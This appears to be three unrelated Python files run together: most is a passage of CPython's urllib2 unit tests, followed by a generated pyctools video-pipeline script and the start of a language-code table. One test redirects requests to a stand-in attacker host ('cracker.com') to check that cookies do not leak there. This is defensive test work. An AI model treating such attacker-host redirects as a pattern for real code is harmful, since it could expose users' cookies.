        return self.do_open(self.httpconn, req)

class MockPasswordManager:
    def add_password(self, realm, uri, user, password):
        self.realm = realm
        self.url = uri
        self.user = user
        self.password = password
    def find_user_password(self, realm, authuri):
        self.target_realm = realm
        self.target_url = authuri
        return self.user, self.password


class OpenerDirectorTests(unittest.TestCase):

    def test_add_non_handler(self):
        class NonHandler(object):
            pass
        self.assertRaises(TypeError,
                          OpenerDirector().add_handler, NonHandler())

    def test_badly_named_methods(self):
        # test work-around for three methods that accidentally follow the
        # naming conventions for handler methods
        # (*_open() / *_request() / *_response())

        # These used to call the accidentally-named methods, causing a
        # TypeError in real code; here, returning self from these mock
        # methods would either cause no exception, or AttributeError.

        from urllib.error import URLError

        o = OpenerDirector()
        meth_spec = [
            [("do_open", "return self"), ("proxy_open", "return self")],
            [("redirect_request", "return self")],
            ]
        handlers = add_ordered_mock_handlers(o, meth_spec)
        o.add_handler(urllib.request.UnknownHandler())
        for scheme in "do", "proxy", "redirect":
            self.assertRaises(URLError, o.open, scheme+"://example.com/")

    def test_handled(self):
        # handler returning non-None means no more handlers will be called
        o = OpenerDirector()
        meth_spec = [
            ["http_open", "ftp_open", "http_error_302"],
            ["ftp_open"],
            [("http_open", "return self")],
            [("http_open", "return self")],
            ]
        handlers = add_ordered_mock_handlers(o, meth_spec)

        req = Request("http://example.com/")
        r = o.open(req)
        # Second .http_open() gets called, third doesn't, since second returned
        # non-None.  Handlers without .http_open() never get any methods called
        # on them.
        # In fact, second mock handler defining .http_open() returns self
        # (instead of response), which becomes the OpenerDirector's return
        # value.
        self.assertEqual(r, handlers[2])
        calls = [(handlers[0], "http_open"), (handlers[2], "http_open")]
        for expected, got in zip(calls, o.calls):
            handler, name, args, kwds = got
            self.assertEqual((handler, name), expected)
            self.assertEqual(args, (req,))

    def test_handler_order(self):
        o = OpenerDirector()
        handlers = []
        for meths, handler_order in [
            ([("http_open", "return self")], 500),
            (["http_open"], 0),
            ]:
            class MockHandlerSubclass(MockHandler): pass
            h = MockHandlerSubclass(meths)
            h.handler_order = handler_order
            handlers.append(h)
            o.add_handler(h)

        r = o.open("http://example.com/")
        # handlers called in reverse order, thanks to their sort order
        self.assertEqual(o.calls[0][0], handlers[1])
        self.assertEqual(o.calls[1][0], handlers[0])

    def test_raise(self):
        # raising URLError stops processing of request
        o = OpenerDirector()
        meth_spec = [
            [("http_open", "raise")],
            [("http_open", "return self")],
            ]
        handlers = add_ordered_mock_handlers(o, meth_spec)

        req = Request("http://example.com/")
        self.assertRaises(urllib.error.URLError, o.open, req)
        self.assertEqual(o.calls, [(handlers[0], "http_open", (req,), {})])

##     def test_error(self):
##         # XXX this doesn't actually seem to be used in standard library,
##         #  but should really be tested anyway...

    def test_http_error(self):
        # XXX http_error_default
        # http errors are a special case
        o = OpenerDirector()
        meth_spec = [
            [("http_open", "error 302")],
            [("http_error_400", "raise"), "http_open"],
            [("http_error_302", "return response"), "http_error_303",
             "http_error"],
            [("http_error_302")],
            ]
        handlers = add_ordered_mock_handlers(o, meth_spec)

        class Unknown:
            def __eq__(self, other): return True

        req = Request("http://example.com/")
        r = o.open(req)
        assert len(o.calls) == 2
        calls = [(handlers[0], "http_open", (req,)),
                 (handlers[2], "http_error_302",
                  (req, Unknown(), 302, "", {}))]
        for expected, got in zip(calls, o.calls):
            handler, method_name, args = expected
            self.assertEqual((handler, method_name), got[:2])
            self.assertEqual(args, got[2])

    def test_processors(self):
        # *_request / *_response methods get called appropriately
        o = OpenerDirector()
        meth_spec = [
            [("http_request", "return request"),
             ("http_response", "return response")],
            [("http_request", "return request"),
             ("http_response", "return response")],
            ]
        handlers = add_ordered_mock_handlers(o, meth_spec)

        req = Request("http://example.com/")
        r = o.open(req)
        # processor methods are called on *all* handlers that define them,
        # not just the first handler that handles the request
        calls = [
            (handlers[0], "http_request"), (handlers[1], "http_request"),
            (handlers[0], "http_response"), (handlers[1], "http_response")]

        for i, (handler, name, args, kwds) in enumerate(o.calls):
            if i < 2:
                # *_request
                self.assertEqual((handler, name), calls[i])
                self.assertEqual(len(args), 1)
                self.assertTrue(isinstance(args[0], Request))
            else:
                # *_response
                self.assertEqual((handler, name), calls[i])
                self.assertEqual(len(args), 2)
                self.assertTrue(isinstance(args[0], Request))
                # response from opener.open is None, because there's no
                # handler that defines http_open to handle it
                self.assertTrue(args[1] is None or
                             isinstance(args[1], MockResponse))


def sanepathname2url(path):
    urlpath = urllib.request.pathname2url(path)
    if os.name == "nt" and urlpath.startswith("///"):
        urlpath = urlpath[2:]
    # XXX don't ask me about the mac...
    return urlpath

class HandlerTests(unittest.TestCase):

    def test_ftp(self):
        class MockFTPWrapper:
            def __init__(self, data): self.data = data
            def retrfile(self, filename, filetype):
                self.filename, self.filetype = filename, filetype
                return io.StringIO(self.data), len(self.data)

        class NullFTPHandler(urllib.request.FTPHandler):
            def __init__(self, data): self.data = data
            def connect_ftp(self, user, passwd, host, port, dirs,
                            timeout=socket._GLOBAL_DEFAULT_TIMEOUT):
                self.user, self.passwd = user, passwd
                self.host, self.port = host, port
                self.dirs = dirs
                self.ftpwrapper = MockFTPWrapper(self.data)
                return self.ftpwrapper

        import ftplib
        data = "rheum rhaponicum"
        h = NullFTPHandler(data)
        o = h.parent = MockOpener()

        for url, host, port, user, passwd, type_, dirs, filename, mimetype in [
            ("ftp://localhost/foo/bar/baz.html",
             "localhost", ftplib.FTP_PORT, "", "", "I",
             ["foo", "bar"], "baz.html", "text/html"),
            ("ftp://parrot@localhost/foo/bar/baz.html",
             "localhost", ftplib.FTP_PORT, "parrot", "", "I",
             ["foo", "bar"], "baz.html", "text/html"),
            ("ftp://%25parrot@localhost/foo/bar/baz.html",
             "localhost", ftplib.FTP_PORT, "%parrot", "", "I",
             ["foo", "bar"], "baz.html", "text/html"),
            ("ftp://%2542parrot@localhost/foo/bar/baz.html",
             "localhost", ftplib.FTP_PORT, "%42parrot", "", "I",
             ["foo", "bar"], "baz.html", "text/html"),
            ("ftp://localhost:80/foo/bar/",
             "localhost", 80, "", "", "D",
             ["foo", "bar"], "", None),
            ("ftp://localhost/baz.gif;type=a",
             "localhost", ftplib.FTP_PORT, "", "", "A",
             [], "baz.gif", None),  # XXX really this should guess image/gif
            ]:
            req = Request(url)
            req.timeout = None
            r = h.ftp_open(req)
            # ftp authentication not yet implemented by FTPHandler
            self.assertEqual(h.user, user)
            self.assertEqual(h.passwd, passwd)
            self.assertEqual(h.host, socket.gethostbyname(host))
            self.assertEqual(h.port, port)
            self.assertEqual(h.dirs, dirs)
            self.assertEqual(h.ftpwrapper.filename, filename)
            self.assertEqual(h.ftpwrapper.filetype, type_)
            headers = r.info()
            self.assertEqual(headers.get("Content-type"), mimetype)
            self.assertEqual(int(headers["Content-length"]), len(data))

    def test_file(self):
        import email.utils, socket
        h = urllib.request.FileHandler()
        o = h.parent = MockOpener()

        TESTFN = support.TESTFN
        urlpath = sanepathname2url(os.path.abspath(TESTFN))
        towrite = b"hello, world\n"
        urls = [
            "file://localhost%s" % urlpath,
            "file://%s" % urlpath,
            "file://%s%s" % (socket.gethostbyname('localhost'), urlpath),
            ]
        try:
            localaddr = socket.gethostbyname(socket.gethostname())
        except socket.gaierror:
            localaddr = ''
        if localaddr:
            urls.append("file://%s%s" % (localaddr, urlpath))

        for url in urls:
            f = open(TESTFN, "wb")
            try:
                try:
                    f.write(towrite)
                finally:
                    f.close()

                r = h.file_open(Request(url))
                try:
                    data = r.read()
                    headers = r.info()
                    respurl = r.geturl()
                finally:
                    r.close()
                stats = os.stat(TESTFN)
                modified = email.utils.formatdate(stats.st_mtime, usegmt=True)
            finally:
                os.remove(TESTFN)
            self.assertEqual(data, towrite)
            self.assertEqual(headers["Content-type"], "text/plain")
            self.assertEqual(headers["Content-length"], "13")
            self.assertEqual(headers["Last-modified"], modified)
            self.assertEqual(respurl, url)

        for url in [
            "file://localhost:80%s" % urlpath,
            "file:///file_does_not_exist.txt",
            "file://%s:80%s/%s" % (socket.gethostbyname('localhost'),
                                   os.getcwd(), TESTFN),
            "file://somerandomhost.ontheinternet.com%s/%s" %
            (os.getcwd(), TESTFN),
            ]:
            try:
                f = open(TESTFN, "wb")
                try:
                    f.write(towrite)
                finally:
                    f.close()

                self.assertRaises(urllib.error.URLError,
                                  h.file_open, Request(url))
            finally:
                os.remove(TESTFN)

        h = urllib.request.FileHandler()
        o = h.parent = MockOpener()
        # XXXX why does // mean ftp (and /// mean not ftp!), and where
        #  is file: scheme specified?  I think this is really a bug, and
        #  what was intended was to distinguish between URLs like:
        # file:/blah.txt (a file)
        # file://localhost/blah.txt (a file)
        # file:///blah.txt (a file)
        # file://ftp.example.com/blah.txt (an ftp URL)
        for url, ftp in [
            ("file://ftp.example.com//foo.txt", True),
            ("file://ftp.example.com///foo.txt", False),
# XXXX bug: fails with OSError, should be URLError
            ("file://ftp.example.com/foo.txt", False),
            ("file://somehost//foo/something.txt", True),
            ("file://localhost//foo/something.txt", False),
            ]:
            req = Request(url)
            try:
                h.file_open(req)
            # XXXX remove OSError when bug fixed
            except (urllib.error.URLError, OSError):
                self.assertFalse(ftp)
            else:
                self.assertIs(o.req, req)
                self.assertEqual(req.type, "ftp")
            self.assertEqual(req.type is "ftp", ftp)

    def test_http(self):

        h = urllib.request.AbstractHTTPHandler()
        o = h.parent = MockOpener()

        url = "http://example.com/"
        for method, data in [("GET", None), ("POST", "blah")]:
            req = Request(url, data, {"Foo": "bar"})
            req.timeout = None
            req.add_unredirected_header("Spam", "eggs")
            http = MockHTTPClass()
            r = h.do_open(http, req)

            # result attributes
            r.read; r.readline  # wrapped MockFile methods
            r.info; r.geturl  # addinfourl methods
            r.code, r.msg == 200, "OK"  # added from MockHTTPClass.getreply()
            hdrs = r.info()
            hdrs.get; hdrs.__contains__  # r.info() gives dict from .getreply()
            self.assertEqual(r.geturl(), url)

            self.assertEqual(http.host, "example.com")
            self.assertEqual(http.level, 0)
            self.assertEqual(http.method, method)
            self.assertEqual(http.selector, "/")
            self.assertEqual(http.req_headers,
                             [("Connection", "close"),
                              ("Foo", "bar"), ("Spam", "eggs")])
            self.assertEqual(http.data, data)

        # check socket.error converted to URLError
        http.raise_on_endheaders = True
        self.assertRaises(urllib.error.URLError, h.do_open, http, req)

        # check adding of standard headers
        o.addheaders = [("Spam", "eggs")]
        for data in "", None:  # POST, GET
            req = Request("http://example.com/", data)
            r = MockResponse(200, "OK", {}, "")
            newreq = h.do_request_(req)
            if data is None:  # GET
                self.assertTrue("Content-length" not in req.unredirected_hdrs)
                self.assertTrue("Content-type" not in req.unredirected_hdrs)
            else:  # POST
                self.assertEqual(req.unredirected_hdrs["Content-length"], "0")
                self.assertEqual(req.unredirected_hdrs["Content-type"],
                             "application/x-www-form-urlencoded")
            # XXX the details of Host could be better tested
            self.assertEqual(req.unredirected_hdrs["Host"], "example.com")
            self.assertEqual(req.unredirected_hdrs["Spam"], "eggs")

            # don't clobber existing headers
            req.add_unredirected_header("Content-length", "foo")
            req.add_unredirected_header("Content-type", "bar")
            req.add_unredirected_header("Host", "baz")
            req.add_unredirected_header("Spam", "foo")
            newreq = h.do_request_(req)
            self.assertEqual(req.unredirected_hdrs["Content-length"], "foo")
            self.assertEqual(req.unredirected_hdrs["Content-type"], "bar")
            self.assertEqual(req.unredirected_hdrs["Host"], "baz")
            self.assertEqual(req.unredirected_hdrs["Spam"], "foo")

    def test_http_doubleslash(self):
        # Checks the presence of any unnecessary double slash in url does not
        # break anything. Previously, a double slash directly after the host
        # could could cause incorrect parsing.
        h = urllib.request.AbstractHTTPHandler()
        o = h.parent = MockOpener()

        data = ""
        ds_urls = [
            "http://example.com/foo/bar/baz.html",
            "http://example.com//foo/bar/baz.html",
            "http://example.com/foo//bar/baz.html",
            "http://example.com/foo/bar//baz.html"
            ]

        for ds_url in ds_urls:
            ds_req = Request(ds_url, data)

            # Check whether host is determined correctly if there is no proxy
            np_ds_req = h.do_request_(ds_req)
            self.assertEqual(np_ds_req.unredirected_hdrs["Host"],"example.com")

            # Check whether host is determined correctly if there is a proxy
            ds_req.set_proxy("someproxy:3128",None)
            p_ds_req = h.do_request_(ds_req)
            self.assertEqual(p_ds_req.unredirected_hdrs["Host"],"example.com")

    def test_fixpath_in_weirdurls(self):
        # Issue4493: urllib2 to supply '/' when to urls where path does not
        # start with'/'

        h = urllib.request.AbstractHTTPHandler()
        o = h.parent = MockOpener()

        weird_url = 'http://www.python.org?getspam'
        req = Request(weird_url)
        newreq = h.do_request_(req)
        self.assertEqual(newreq.host,'www.python.org')
        self.assertEqual(newreq.selector,'/?getspam')

        url_without_path = 'http://www.python.org'
        req = Request(url_without_path)
        newreq = h.do_request_(req)
        self.assertEqual(newreq.host,'www.python.org')
        self.assertEqual(newreq.selector,'')


    def test_errors(self):
        h = urllib.request.HTTPErrorProcessor()
        o = h.parent = MockOpener()

        url = "http://example.com/"
        req = Request(url)
        # all 2xx are passed through
        r = MockResponse(200, "OK", {}, "", url)
        newr = h.http_response(req, r)
        self.assertIs(r, newr)
        self.assertFalse(hasattr(o, "proto"))  # o.error not called
        r = MockResponse(202, "Accepted", {}, "", url)
        newr = h.http_response(req, r)
        self.assertIs(r, newr)
        self.assertFalse(hasattr(o, "proto"))  # o.error not called
        r = MockResponse(206, "Partial content", {}, "", url)
        newr = h.http_response(req, r)
        self.assertIs(r, newr)
        self.assertFalse(hasattr(o, "proto"))  # o.error not called
        # anything else calls o.error (and MockOpener returns None, here)
        r = MockResponse(502, "Bad gateway", {}, "", url)
        self.assertIsNone(h.http_response(req, r))
        self.assertEqual(o.proto, "http")  # o.error called
        self.assertEqual(o.args, (req, r, 502, "Bad gateway", {}))

    def test_cookies(self):
        cj = MockCookieJar()
        h = urllib.request.HTTPCookieProcessor(cj)
        o = h.parent = MockOpener()

        req = Request("http://example.com/")
        r = MockResponse(200, "OK", {}, "")
        newreq = h.http_request(req)
        self.assertIs(cj.ach_req, req)
        self.assertIs(cj.ach_req, newreq)
        self.assertEqual(req.get_origin_req_host(), "example.com")
        self.assertFalse(req.is_unverifiable())
        newr = h.http_response(req, r)
        self.assertIs(cj.ec_req, req)
        self.assertIs(cj.ec_r, r)
        self.assertIs(r, newr)

    def test_redirect(self):
        from_url = "http://example.com/a.html"
        to_url = "http://example.com/b.html"
        h = urllib.request.HTTPRedirectHandler()
        o = h.parent = MockOpener()

        # ordinary redirect behaviour
        for code in 301, 302, 303, 307:
            for data in None, "blah\nblah\n":
                method = getattr(h, "http_error_%s" % code)
                req = Request(from_url, data)
                req.timeout = socket._GLOBAL_DEFAULT_TIMEOUT
                req.add_header("Nonsense", "viking=withhold")
                if data is not None:
                    req.add_header("Content-Length", str(len(data)))
                req.add_unredirected_header("Spam", "spam")
                try:
                    method(req, MockFile(), code, "Blah",
                           MockHeaders({"location": to_url}))
                except urllib.error.HTTPError:
                    # 307 in response to POST requires user OK
                    self.assertTrue(code == 307 and data is not None)
                self.assertEqual(o.req.get_full_url(), to_url)
                try:
                    self.assertEqual(o.req.get_method(), "GET")
                except AttributeError:
                    self.assertFalse(o.req.has_data())

                # now it's a GET, there should not be headers regarding content
                # (possibly dragged from before being a POST)
                headers = [x.lower() for x in o.req.headers]
                self.assertTrue("content-length" not in headers)
                self.assertTrue("content-type" not in headers)

                self.assertEqual(o.req.headers["Nonsense"],
                                 "viking=withhold")
                self.assertTrue("Spam" not in o.req.headers)
                self.assertTrue("Spam" not in o.req.unredirected_hdrs)

        # loop detection
        req = Request(from_url)
        req.timeout = socket._GLOBAL_DEFAULT_TIMEOUT
        def redirect(h, req, url=to_url):
            h.http_error_302(req, MockFile(), 302, "Blah",
                             MockHeaders({"location": url}))
        # Note that the *original* request shares the same record of
        # redirections with the sub-requests caused by the redirections.

        # detect infinite loop redirect of a URL to itself
        req = Request(from_url, origin_req_host="example.com")
        count = 0
        req.timeout = socket._GLOBAL_DEFAULT_TIMEOUT
        try:
            while 1:
                redirect(h, req, "http://example.com/")
                count = count + 1
        except urllib.error.HTTPError:
            # don't stop until max_repeats, because cookies may introduce state
            self.assertEqual(count, urllib.request.HTTPRedirectHandler.max_repeats)

        # detect endless non-repeating chain of redirects
        req = Request(from_url, origin_req_host="example.com")
        count = 0
        req.timeout = socket._GLOBAL_DEFAULT_TIMEOUT
        try:
            while 1:
                redirect(h, req, "http://example.com/%d" % count)
                count = count + 1
        except urllib.error.HTTPError:
            self.assertEqual(count,
                             urllib.request.HTTPRedirectHandler.max_redirections)

    def test_cookie_redirect(self):
        # cookies shouldn't leak into redirected requests
        from http.cookiejar import CookieJar
        from test.test_http_cookiejar import interact_netscape

        cj = CookieJar()
        interact_netscape(cj, "http://www.example.com/", "spam=eggs")
        hh = MockHTTPHandler(302, "Location: http://www.cracker.com/\r\n\r\n")
        hdeh = urllib.request.HTTPDefaultErrorHandler()
        hrh = urllib.request.HTTPRedirectHandler()
        cp = urllib.request.HTTPCookieProcessor(cj)
        o = build_test_opener(hh, hdeh, hrh, cp)
        o.open("http://www.example.com/")
        self.assertFalse(hh.req.has_header("Cookie"))

    def test_proxy(self):
        o = OpenerDirector()
        ph = urllib.request.ProxyHandler(dict(http="proxy.example.com:3128"))
        o.add_handler(ph)
        meth_spec = [
            [("http_open", "return response")]
            ]
        handlers = add_ordered_mock_handlers(o, meth_spec)

        req = Request("http://acme.example.com/")
        self.assertEqual(req.get_host(), "acme.example.com")
        r = o.open(req)
        self.assertEqual(req.get_host(), "proxy.example.com:3128")

        self.assertEqual([(handlers[0], "http_open")],
                         [tup[0:2] for tup in o.calls])

    def test_proxy_no_proxy(self):
        os.environ['no_proxy'] = 'python.org'
        o = OpenerDirector()
        ph = urllib.request.ProxyHandler(dict(http="proxy.example.com"))
        o.add_handler(ph)
        req = Request("http://www.perl.org/")
        self.assertEqual(req.get_host(), "www.perl.org")
        r = o.open(req)
        self.assertEqual(req.get_host(), "proxy.example.com")
        req = Request("http://www.python.org")
        self.assertEqual(req.get_host(), "www.python.org")
        r = o.open(req)
        self.assertEqual(req.get_host(), "www.python.org")
        del os.environ['no_proxy']


    def test_proxy_https(self):
        o = OpenerDirector()
        ph = urllib.request.ProxyHandler(dict(https="proxy.example.com:3128"))
        o.add_handler(ph)
        meth_spec = [
            [("https_open", "return response")]
        ]
        handlers = add_ordered_mock_handlers(o, meth_spec)

        req = Request("https://www.example.com/")
        self.assertEqual(req.get_host(), "www.example.com")
        r = o.open(req)
        self.assertEqual(req.get_host(), "proxy.example.com:3128")
        self.assertEqual([(handlers[0], "https_open")],
                         [tup[0:2] for tup in o.calls])

    def test_proxy_https_proxy_authorization(self):
        o = OpenerDirector()
        ph = urllib.request.ProxyHandler(dict(https='proxy.example.com:3128'))
        o.add_handler(ph)
        https_handler = MockHTTPSHandler()
        o.add_handler(https_handler)
        req = Request("https://www.example.com/")
        req.add_header("Proxy-Authorization","FooBar")
        req.add_header("User-Agent","Grail")
        self.assertEqual(req.get_host(), "www.example.com")
        self.assertIsNone(req._tunnel_host)
        r = o.open(req)
        # Verify Proxy-Authorization gets tunneled to request.
        # httpsconn req_headers do not have the Proxy-Authorization header but
        # the req will have.
        self.assertFalse(("Proxy-Authorization","FooBar") in
                         https_handler.httpconn.req_headers)
        self.assertTrue(("User-Agent","Grail") in
                        https_handler.httpconn.req_headers)
        self.assertIsNotNone(req._tunnel_host)
        self.assertEqual(req.get_host(), "proxy.example.com:3128")
        self.assertEqual(req.get_header("Proxy-authorization"),"FooBar")

    def test_basic_auth(self, quote_char='"'):
        opener = OpenerDirector()
        password_manager = MockPasswordManager()
        auth_handler = urllib.request.HTTPBasicAuthHandler(password_manager)
        realm = "ACME Widget Store"
        http_handler = MockHTTPHandler(
            401, 'WWW-Authenticate: Basic realm=%s%s%s\r\n\r\n' %
            (quote_char, realm, quote_char) )
        opener.add_handler(auth_handler)
        opener.add_handler(http_handler)
        self._test_basic_auth(opener, auth_handler, "Authorization",
                              realm, http_handler, password_manager,
                              "http://acme.example.com/protected",
                              "http://acme.example.com/protected",
                              )

    def test_basic_auth_with_single_quoted_realm(self):
        self.test_basic_auth(quote_char="'")

    def test_proxy_basic_auth(self):
        opener = OpenerDirector()
        ph = urllib.request.ProxyHandler(dict(http="proxy.example.com:3128"))
        opener.add_handler(ph)
        password_manager = MockPasswordManager()
        auth_handler = urllib.request.ProxyBasicAuthHandler(password_manager)
        realm = "ACME Networks"
        http_handler = MockHTTPHandler(
            407, 'Proxy-Authenticate: Basic realm="%s"\r\n\r\n' % realm)
        opener.add_handler(auth_handler)
        opener.add_handler(http_handler)
        self._test_basic_auth(opener, auth_handler, "Proxy-authorization",
                              realm, http_handler, password_manager,
                              "http://acme.example.com:3128/protected",
                              "proxy.example.com:3128",
                              )

    def test_basic_and_digest_auth_handlers(self):
        # HTTPDigestAuthHandler threw an exception if it couldn't handle a 40*
        # response (http://python.org/sf/1479302), where it should instead
        # return None to allow another handler (especially
        # HTTPBasicAuthHandler) to handle the response.

        # Also (http://python.org/sf/14797027, RFC 2617 section 1.2), we must
        # try digest first (since it's the strongest auth scheme), so we record
        # order of calls here to check digest comes first:
        class RecordingOpenerDirector(OpenerDirector):
            def __init__(self):
                OpenerDirector.__init__(self)
                self.recorded = []
            def record(self, info):
                self.recorded.append(info)
        class TestDigestAuthHandler(urllib.request.HTTPDigestAuthHandler):
            def http_error_401(self, *args, **kwds):
                self.parent.record("digest")
                urllib.request.HTTPDigestAuthHandler.http_error_401(self,
                                                             *args, **kwds)
        class TestBasicAuthHandler(urllib.request.HTTPBasicAuthHandler):
            def http_error_401(self, *args, **kwds):
                self.parent.record("basic")
                urllib.request.HTTPBasicAuthHandler.http_error_401(self,
                                                            *args, **kwds)

        opener = RecordingOpenerDirector()
        password_manager = MockPasswordManager()
        digest_handler = TestDigestAuthHandler(password_manager)
        basic_handler = TestBasicAuthHandler(password_manager)
        realm = "ACME Networks"
        http_handler = MockHTTPHandler(
            401, 'WWW-Authenticate: Basic realm="%s"\r\n\r\n' % realm)
        opener.add_handler(basic_handler)
        opener.add_handler(digest_handler)
        opener.add_handler(http_handler)

        # check basic auth isn't blocked by digest handler failing
        self._test_basic_auth(opener, basic_handler, "Authorization",
                              realm, http_handler, password_manager,
                              "http://acme.example.com/protected",
                              "http://acme.example.com/protected",
                              )
        # check digest was tried before basic (twice, because
        # _test_basic_auth called .open() twice)
        self.assertEqual(opener.recorded, ["digest", "basic"]*2)

    def _test_basic_auth(self, opener, auth_handler, auth_header,
                         realm, http_handler, password_manager,
                         request_url, protected_url):
        import base64
        user, password = "wile", "coyote"

        # .add_password() fed through to password manager
        auth_handler.add_password(realm, request_url, user, password)
        self.assertEqual(realm, password_manager.realm)
        self.assertEqual(request_url, password_manager.url)
        self.assertEqual(user, password_manager.user)
        self.assertEqual(password, password_manager.password)

        r = opener.open(request_url)

        # should have asked the password manager for the username/password
        self.assertEqual(password_manager.target_realm, realm)
        self.assertEqual(password_manager.target_url, protected_url)

        # expect one request without authorization, then one with
        self.assertEqual(len(http_handler.requests), 2)
        self.assertFalse(http_handler.requests[0].has_header(auth_header))
        userpass = bytes('%s:%s' % (user, password), "ascii")
        auth_hdr_value = ('Basic ' +
            base64.encodebytes(userpass).strip().decode())
        self.assertEqual(http_handler.requests[1].get_header(auth_header),
                         auth_hdr_value)
        self.assertEqual(http_handler.requests[1].unredirected_hdrs[auth_header],
                         auth_hdr_value)
        # if the password manager can't find a password, the handler won't
        # handle the HTTP auth error
        password_manager.user = password_manager.password = None
        http_handler.reset()
        r = opener.open(request_url)
        self.assertEqual(len(http_handler.requests), 1)
        self.assertFalse(http_handler.requests[0].has_header(auth_header))

class MiscTests(unittest.TestCase):

    def test_build_opener(self):
        class MyHTTPHandler(urllib.request.HTTPHandler): pass
        class FooHandler(urllib.request.BaseHandler):
            def foo_open(self): pass
        class BarHandler(urllib.request.BaseHandler):
            def bar_open(self): pass

        build_opener = urllib.request.build_opener

        o = build_opener(FooHandler, BarHandler)
        self.opener_has_handler(o, FooHandler)
        self.opener_has_handler(o, BarHandler)

        # can take a mix of classes and instances
        o = build_opener(FooHandler, BarHandler())
        self.opener_has_handler(o, FooHandler)
        self.opener_has_handler(o, BarHandler)

        # subclasses of default handlers override default handlers
        o = build_opener(MyHTTPHandler)
        self.opener_has_handler(o, MyHTTPHandler)

        # a particular case of overriding: default handlers can be passed
        # in explicitly
        o = build_opener()
        self.opener_has_handler(o, urllib.request.HTTPHandler)
        o = build_opener(urllib.request.HTTPHandler)
        self.opener_has_handler(o, urllib.request.HTTPHandler)
        o = build_opener(urllib.request.HTTPHandler())
        self.opener_has_handler(o, urllib.request.HTTPHandler)

        # Issue2670: multiple handlers sharing the same base class
        class MyOtherHTTPHandler(urllib.request.HTTPHandler): pass
        o = build_opener(MyHTTPHandler, MyOtherHTTPHandler)
        self.opener_has_handler(o, MyHTTPHandler)
        self.opener_has_handler(o, MyOtherHTTPHandler)

    def opener_has_handler(self, opener, handler_class):
        self.assertTrue(any(h.__class__ == handler_class
                            for h in opener.handlers))

class RequestTests(unittest.TestCase):

    def setUp(self):
        self.get = Request("http://www.python.org/~jeremy/")
        self.post = Request("http://www.python.org/~jeremy/",
                            "data",
                            headers={"X-Test": "test"})

    def test_method(self):
        self.assertEqual("POST", self.post.get_method())
        self.assertEqual("GET", self.get.get_method())

    def test_add_data(self):
        self.assertFalse(self.get.has_data())
        self.assertEqual("GET", self.get.get_method())
        self.get.add_data("spam")
        self.assertTrue(self.get.has_data())
        self.assertEqual("POST", self.get.get_method())

    def test_get_full_url(self):
        self.assertEqual("http://www.python.org/~jeremy/",
                         self.get.get_full_url())

    def test_selector(self):
        self.assertEqual("/~jeremy/", self.get.get_selector())
        req = Request("http://www.python.org/")
        self.assertEqual("/", req.get_selector())

    def test_get_type(self):
        self.assertEqual("http", self.get.get_type())

    def test_get_host(self):
        self.assertEqual("www.python.org", self.get.get_host())

    def test_get_host_unquote(self):
        req = Request("http://www.%70ython.org/")
        self.assertEqual("www.python.org", req.get_host())

    def test_proxy(self):
        self.assertFalse(self.get.has_proxy())
        self.get.set_proxy("www.perl.org", "http")
        self.assertTrue(self.get.has_proxy())
        self.assertEqual("www.python.org", self.get.get_origin_req_host())
        self.assertEqual("www.perl.org", self.get.get_host())

    def test_wrapped_url(self):
        req = Request("<URL:http://www.python.org>")
        self.assertEqual("www.python.org", req.get_host())

    def test_urlwith_fragment(self):
        req = Request("http://www.python.org/?qs=query#fragment=true")
        self.assertEqual("/?qs=query", req.get_selector())
        req = Request("http://www.python.org/#fun=true")
        self.assertEqual("/", req.get_selector())


def test_main(verbose=None):
    from test import test_urllib2
    support.run_doctest(test_urllib2, verbose)
    support.run_doctest(urllib.request, verbose)
    tests = (TrivialTests,
             OpenerDirectorTests,
             HandlerTests,
             MiscTests,
             RequestTests)
    support.run_unittest(*tests)

if __name__ == "__main__":
    test_main(verbose=True)

#!/usr/bin/env python
# File written by pyctools-editor. Do not edit.

import argparse
import logging
from pyctools.core.compound import Compound
import pyctools.components.arithmetic
import pyctools.components.qt.qtdisplay
import pyctools.components.zone.zoneplategenerator

class Network(object):
    components = \
{   'clipper': {   'class': 'pyctools.components.arithmetic.Arithmetic',
                   'config': "{'func': '16+((data > 180)*219)'}",
                   'pos': (200.0, 200.0)},
    'clipper2': {   'class': 'pyctools.components.arithmetic.Arithmetic',
                    'config': "{'func': '16+((data > 230)*219)'}",
                    'pos': (200.0, 330.0)},
    'qd': {   'class': 'pyctools.components.qt.qtdisplay.QtDisplay',
              'config': "{'framerate': 60}",
              'pos': (460.0, 200.0)},
    'stacker': {   'class': 'pyctools.components.arithmetic.Arithmetic2',
                   'config': "{'func': 'numpy.vstack((data1,data2))'}",
                   'pos': (330.0, 200.0)},
    'zpg': {   'class': 'pyctools.components.zone.zoneplategenerator.ZonePlateGenerator',
               'config': "{'kx': 0.04, 'kt': -0.34, 'xlen': 600, 'ylen': "
                         "400, 'zlen': 1000, 'looping': 'repeat'}",
               'pos': (70.0, 200.0)},
    'zpg2': {   'class': 'pyctools.components.zone.zoneplategenerator.ZonePlateGenerator',
                'config': "{'kx': 0.002, 'kt': -0.017, 'xlen': 600, 'ylen': "
                          "200, 'zlen': 1000, 'looping': 'repeat'}",
                'pos': (70.0, 330.0)}}
    linkages = \
{   ('clipper', 'output'): [('stacker', 'input1')],
    ('clipper2', 'output'): [('stacker', 'input2')],
    ('stacker', 'output'): [('qd', 'input')],
    ('zpg', 'output'): [('clipper', 'input')],
    ('zpg2', 'output'): [('clipper2', 'input')]}

    def make(self):
        comps = {}
        for name, component in self.components.items():
            comps[name] = eval(component['class'])(config=eval(component['config']))
        return Compound(linkages=self.linkages, **comps)

if __name__ == '__main__':
    from PyQt5 import QtCore, QtWidgets
    QtWidgets.QApplication.setAttribute(QtCore.Qt.AA_X11InitThreads)
    app = QtWidgets.QApplication([])

    comp = Network().make()
    cnf = comp.get_config()
    parser = argparse.ArgumentParser(
        formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    cnf.parser_add(parser)
    parser.add_argument('-v', '--verbose', action='count', default=0,
                        help='increase verbosity of log messages')
    args = parser.parse_args()
    logging.basicConfig(level=logging.ERROR - (args.verbose * 10))
    del args.verbose
    cnf.parser_set(args)
    comp.set_config(cnf)
    comp.start()
    app.exec_()

    comp.stop()
    comp.join()

# -*- coding: utf-8 -*-
import itertools
"""
Languages           | ShortCode     | Wordnet
Albanian            |   sq          |   als
Arabic              |   ar          |   arb
Bulgarian           |   bg          |   bul
Catalan             |   ca          |   cat
Chinese             |   zh          |   cmn
Chinese (Taiwan)    |   qn          |   qcn
Greek               |   el          |   ell
Basque              |   eu          |   eus
Persian             |   fa          |   fas
Finish              |   fi          |   fin
French              |   fr          |   fra
Galician            |   gl          |   glg
Hebrew              |   he          |   heb
